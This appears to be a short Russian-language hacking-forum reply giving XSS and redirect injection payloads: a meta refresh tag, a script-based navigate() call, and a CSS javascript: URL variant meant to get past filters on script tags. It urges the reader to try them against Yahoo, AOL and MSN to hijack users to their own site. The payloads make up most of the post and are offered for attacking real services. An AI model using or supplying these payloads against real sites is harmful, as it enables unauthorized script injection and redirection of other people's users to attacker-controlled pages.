<meta http-equiv=Refresh content='1; url= mysite.com'>

теги мета возможны только внутри тегов <head> и </head>, т.е. в "заголовке", как и <title>, </title>

Теги <script> почти всегда запрещены, но вдруг повезет.
<script>navigate( "http://Antichat.ru" );</script> - подставь вместо античата свой сайт
либо так (если запрещены <script>)
<a href="bla" style=bacgkround:url(javascript:navigate("http://Antichat.ru"))>bla-bla-bla</a>


Вобщем то, ты хочешь найти уязвимость в yahoo, aol, msn.com.
Врядли там станет возможным пересылать юзера на страницы, но кто знает - возможно именно ты найдешь возможность вставки скриптов в хреновенький yahoo)).